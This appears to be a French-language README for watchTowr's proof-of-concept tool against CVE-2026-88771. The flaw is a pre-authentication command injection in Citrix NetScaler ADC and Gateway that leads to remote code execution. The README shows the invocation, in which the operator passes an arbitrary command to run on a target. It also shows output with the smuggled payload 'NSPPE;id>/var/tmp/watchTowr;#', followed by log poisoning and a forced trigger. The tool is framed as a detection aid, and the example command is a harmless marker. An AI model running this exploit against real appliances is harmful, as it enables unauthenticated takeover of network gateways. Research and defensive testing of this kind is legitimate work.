Générateur d'artefacts de détection pour Citrix NetScaler CVE-2026-88771, exploitant une injection de commande pré-authentification pour obtenir une exécution de code à distance contre les déploiements ADC et Gateway.
Générateur d'artefacts de détection pour Citrix NetScaler CVE-2026-88771
Consultez notre article de blog pour les détails techniques.
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
la prise en compte de la commande peut prendre jusqu'à 24 heures De plus, la technique de force pickup n'est pas incluse
Tous les déploiements NetScaler ADC et NetScaler Gateway (configuration par défaut / aucune fonctionnalité supplémentaire requise)
Reportez-vous à l'avis officiel de Citrix pour obtenir la liste des versions affectées.
Pour les dernières recherches en sécurité, suivez l'équipe des Labs watchTowr